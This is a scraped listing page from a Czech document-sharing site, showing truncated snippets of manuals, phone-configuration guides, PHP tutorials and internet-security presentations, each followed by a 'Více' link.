Kaspersky ONE. univerzální zabezpečení. Ochrana různých zařízení Kaspersky ONE univerzální zabezpečení Ochrana různých zařízení Ochrana notebooku Rizikem pro notebooky jsou nezabezpečená připojení Wi-Fi. Komplexní ochranné technologie neustále monitorují veškerý příchozí

Více

schopni vysvětlit, co znamená protokol NFS a k čemu se používá; umět rozpoznat autorské dílo a znát autorská práva;

schopni vysvětlit, co znamená protokol NFS a k čemu se používá; umět rozpoznat autorské dílo a znát autorská práva; POKYNY KE STUDIU 1 Rozšiřující data na Internetu Pracovní materiály Doprovodné obrázky a videa na Internetu Rejstřík pojmů 7 SDÍLENÍ DAT Čas ke studiu: 1,5 hodiny Cíl: Po prostudování této kapitoly budete:

Více

Nastavení telefonu Nokia Asha 311

Nastavení telefonu Nokia Asha 311 Nastavení telefonu Nokia Asha 311 Telefon Nokia Asha 311, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud

Více

Střední odborná škola a Střední odborné učiliště, Hořovice

Střední odborná škola a Střední odborné učiliště, Hořovice Kód DUM : VY_32_INOVACE_DYN.1.15 Název materiálu: Anotace Autor Jazyk Očekávaný výstup 15 PHP- funkce mail() v PHP odesílání e-mailu pomocí dynamické stránky DUM je námětem k řešení jednoduché mailové

Více

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Projekt je realizován v rámci Operačního programu Vzdělávání pro konkurence

Více

Vzájemné uznávání C-TPAT. Registrace a údržba EORI

Vzájemné uznávání C-TPAT. Registrace a údržba EORI Vzájemné uznávání C-TPAT Registrace a údržba EORI Obrazovka pro přihlášení https://mrctpat.cbp.dhs.gov Stránka umožňuje uživatelům, kteří již mají vytvořený účet, zadat své uživatelské jméno a heslo. Stránka

Více

Manuál pro správu uživatelských účtů aplikace MoneyWeb

Manuál pro správu uživatelských účtů aplikace MoneyWeb Manuál pro správu uživatelských účtů aplikace MoneyWeb Poznámka: Tento manuál byl vytvořen za použití Microsoft Internet Exploreru verze 6 cs. Používáte-li jinou verzi MS Internet Exploreru nebo jiný prohlížeč

Více

Dokumentace. k projektu Czech POINT Provozní řád. Rychlý znalostní kvíz a doplnění informací

Dokumentace. k projektu Czech POINT Provozní řád. Rychlý znalostní kvíz a doplnění informací Dokumentace k projektu Czech POINT Provozní řád Rychlý znalostní kvíz a doplnění informací Vytvořeno dne: 19.11.2009 Aktualizováno: 25.11.2009 Verze: 1.0 Obsah 1. Přihlášení do centrály Czech POINT...

Více

TouchGuard Online pochůzkový systém

TouchGuard Online pochůzkový systém TouchGuard Příprava telefonu a instalace aplikace Administrátorský manuál TTC TELEKOMUNIKACE, s.r.o. Třebohostická 987/5 100 00 Praha 10 tel.: 234 052 111 fax.: 234 052 999 e-mail: ttc@ttc.cz http://www.ttc-telekomunikace.cz

Více

Peníze! COMMUNICATION WEDNESDAY 4. listopadu 2015 Osobní bezpečnost na internetu. Karel Miko, DCIT, a.s. miko@dcit.cz

Peníze! COMMUNICATION WEDNESDAY 4. listopadu 2015 Osobní bezpečnost na internetu. Karel Miko, DCIT, a.s. miko@dcit.cz Peníze! COMMUNICATION WEDNESDAY 4. listopadu 2015 Osobní bezpečnost na internetu Karel Miko, DCIT, a.s. miko@dcit.cz O čem bude příspěvek? o penězích o penězích v online světě o krádežích peněz o krádežích

Více

Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je

Bezpečnostní zásady. d) Disponent je povinen při používání čipové karty nebo USB tokenu, na nichž je Bezpečnostní zásady Česká národní banka (ČNB) věnuje trvalou pozornost nadstandardnímu zabezpečení aplikace ABO-K internetové bankovnictví (dále jen ABO-K ), proto využívá moderní technologie pro ochranu

Více

Popis programu EnicomD

Popis programu EnicomD Popis programu EnicomD Pomocí programu ENICOM D lze konfigurovat výstup RS 232 přijímačů Rx1 DIN/DATA a Rx1 DATA (přidělovat textové řetězce k jednotlivým vysílačům resp. tlačítkům a nastavovat parametry

Více

Průvodce instalací modulu Offline VetShop verze 3.4

Průvodce instalací modulu Offline VetShop verze 3.4 Průvodce instalací modulu Offline VetShop verze 3.4 Úvod k instalaci Tato instalační příručka je určena uživatelům objednávkového modulu Offline VetShop verze 3.4. Obsah 1. Instalace modulu Offline VetShop...

Více

webmarketin Základní moduly aplikace

webmarketin Základní moduly aplikace webmarketin Aplikace webmarketing je komplexní online nástroj určený pro podporu a řízení marketingu a CRM ve společnosti. Její součástí jsou webové ankety, SMS kampaně nebo newslettery, které lze spravovat

Více

Tyto slidy jsou volně k dispozici účastníkům prezentace, včetně dalšího šíření v rámci jejich organizace. Pokud prezentaci nebo její část použijete bez provedení zásadních změn v obsahu, prosím uveďte

Více

Databázové aplikace pro internetové prostředí. 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku

Databázové aplikace pro internetové prostředí. 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku Databázové aplikace pro internetové prostředí 01 - PHP úvod, základní princip, vkládání skriptu, komentáře, výpis na obrazovku Projekt: Inovace výuky prostřednictvím ICT Registrační číslo: CZ.1.07/1.5.00/34.250

Více

Nastavení telefonu Sony Ericsson T300

Nastavení telefonu Sony Ericsson T300 Nastavení telefonu Sony Ericsson T300 Telefon Sony Ericsson T300, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny.

Více

Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32

Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32 Informační systém ISOP 7-13 Vypracováno pro CzechInvest Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32 vypracovala společnost ASD Software, s.r.o. Dokument ze dne 20.2.2015, verze 1.00 Konfigurace

Více

Web-Exam. Průvodce lektora administrační částí

Web-Exam. Průvodce lektora administrační částí Web-Exam Průvodce lektora administrační částí Po přihlášení ke svému lektorskému účtu uvidíte rozcestník V sekci Moje předměty zakládáte své vyučované předměty. U předmětu zapíšete název a stisknete Přidat

Více

Aplikace a služba Money Dnes Publisher v deseti krocích

Aplikace a služba Money Dnes Publisher v deseti krocích 2 Money Dnes Publisher Uživatelská příručka Aplikace a služba Money Dnes Publisher v deseti krocích Tento step-by-step manuál vás provede korektním nastavením ovladače Money Dnes Publisher pomocí přiloženého

Více

Michaela Sluková, Lenka Ščepánková 15.5.2014

Michaela Sluková, Lenka Ščepánková 15.5.2014 ČVUT FJFI 15.5.2014 1 Úvod 2 3 4 OpenPGP Úvod Jak? Zašifrovat email lze pomocí šifrování zprávy samotné či elektronickým podpisem emailových zpráv. Proč? Zprávu nepřečte někdo jiný a nemůže být změněna,

Více

ČSOB Business Connector instalační příručka

ČSOB Business Connector instalační příručka ČSOB Business Connector instalační příručka Obsah 1 Úvod... 2 2 Získání komerčního serverového certifikátu... 2 2.1 Vytvoření žádosti o certifikát v počítači... 2 2.2 Instalace certifikátu na počítač...

Více

Redakční systém Joomla. Prokop Zelený

Redakční systém Joomla. Prokop Zelený Redakční systém Joomla Prokop Zelený 1 Co jsou to red. systémy? Redakční systémy (anglicky Content Management System - CMS) jsou webové aplikace používané pro snadnou správu obsahu stránek. Hlavním cílem

Více

Petra Bartošová Partner Account Manager

Petra Bartošová Partner Account Manager Petra Bartošová Partner Account Manager Agenda: 1. Konec podpory Windows XP 2. Scénáře prodeje 3. Konec podpory Office 2003 4. Vaše dotazy Marketingová kampaň Vrchol březen 2014 Komunikační kampaň cílená

Více

Nastavení telefonu Nokia Lumia 925

Nastavení telefonu Nokia Lumia 925 Nastavení telefonu Nokia Lumia 925 Telefon Nokia Lumia 925, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Některé

Více

Testování webových aplikací Seznam.cz

Testování webových aplikací Seznam.cz Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci

Více

Uživatelská dokumentace

Uživatelská dokumentace Uživatelská dokumentace Verze 14-06 2010 Stahování DTMM (v rámci služby Geodata Distribution) OBSAH OBSAH...2 1. O MAPOVÉM SERVERU...3 2. NASTAVENÍ PROSTŘEDÍ...3 2.1 Hardwarové požadavky...3 2.2 Softwarové

Více

Uživatelská příručka

Uživatelská příručka Uživatelská příručka Uživatelská příručka k aplikaci Norton Internet Security Software popsaný v této knize je poskytnut pod licenční dohodou a smí být používán pouze v souladu s podmínkami této dohody.

Více

VÝZNAM BEZPEČNOSTI MOBILNÍCH PLATFOREM JDE RUKU V RUCE S ROSTOUCÍ POPULARITOU SMARTPHONŮ

VÝZNAM BEZPEČNOSTI MOBILNÍCH PLATFOREM JDE RUKU V RUCE S ROSTOUCÍ POPULARITOU SMARTPHONŮ VÝZNAM BEZPEČNOSTI MOBILNÍCH PLATFOREM JDE RUKU V RUCE S ROSTOUCÍ POPULARITOU SMARTPHONŮ Bohdan Vrabec PCS spol. s r.o. b.vrabec@pcs.cz www.dataguard.cz Založena v roce 1992 Zeměření na IT bezpečnost Poskytování

Více

Databáze prodejců. Tlačítka. Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce Uloží nového prodejce nebo změnu (Alt+U);

Databáze prodejců. Tlačítka. Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce Uloží nového prodejce nebo změnu (Alt+U); Databáze prodejců Tlačítka Vytvoří kartu nového prodejce (Alt+N); Změní vybraného prodejce (Alt+E); Uloží nového prodejce nebo změnu (Alt+U); Při zakládání nového prodejce zadejte jeho číslo (musí to být

Více

Inovace bakalářského studijního oboru Aplikovaná chemie http://aplchem.upol.cz

Inovace bakalářského studijního oboru Aplikovaná chemie http://aplchem.upol.cz http://aplchem.upol.cz CZ.1.07/2.2.00/15.0247 Tento projekt je spolufinancován Evropským sociálním fondem a státním rozpočtem České republiky. Internet a zdroje Elektronická pošta a její správa, bezpečnost

Více

Počítačové viry a jiné hrozby

Počítačové viry a jiné hrozby Počítačové viry a jiné hrozby Název školy Základní škola a Mateřská škola Tatenice Číslo projektu CZ. 1.07 Název šablony klíčové Inovace a zkvalitnění výuky pomocí ICT aktivity Vzdělávací oblast Počítačové

Více

Klient online. Uživatelská příručka. verze 02.06

Klient online. Uživatelská příručka. verze 02.06 Klient online Uživatelská příručka verze 02.06 Obsah 1. Seznámení s aplikací Klient online...3 2. Bezpečnost aplikace...3 2.1 Šifrovaná komunikace...3 2.2 Nevyžádané e-maily...3 2.3 Bezpečnost z vaší strany...3

Více

Nastavení telefonu Windows Phone 8S by HTC

Nastavení telefonu Windows Phone 8S by HTC Nastavení telefonu Windows Phone 8S by HTC Telefon Windows Phone 8S by HTC, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny.

Více

Nastavení telefonu HTC Desire

Nastavení telefonu HTC Desire Nastavení telefonu HTC Desire Telefon HTC Desire, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny. Pokud je potřeba

Více

Nastavení telefonu Samsung S5230 Star

Nastavení telefonu Samsung S5230 Star Nastavení telefonu Samsung S5230 Star Telefon Samsung S5230 Star, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny.

Více

Nastavení telefonu Sony Ericsson XPERIA X10

Nastavení telefonu Sony Ericsson XPERIA X10 Nastavení telefonu Sony Ericsson XPERIA X10 Telefon Sony Ericsson XPERIA X10, zakoupený v prodejní síti společnosti T-Mobile Czech Republic a.s., má potřebné parametry pro použití T-Mobile služeb již přednastaveny.

Více

Jan Forman Manuál 30.5.2013. CLASSIFICATIO N: public / veřejný dokument IDE NTIFICATIO N N U MBER: 0000000000001 AUTH OR:

Jan Forman Manuál 30.5.2013. CLASSIFICATIO N: public / veřejný dokument IDE NTIFICATIO N N U MBER: 0000000000001 AUTH OR: CLASSIFICATIO N: public / veřejný dokument TITLE: Manuál k webovému rozhraní hostingu P ub l i c URL: http://janforman.org/files/webhosting.pdf OFFICE NAME AND ADDRESS: --- IDE NTIFICATIO N N U MBER: 0000000000001

Více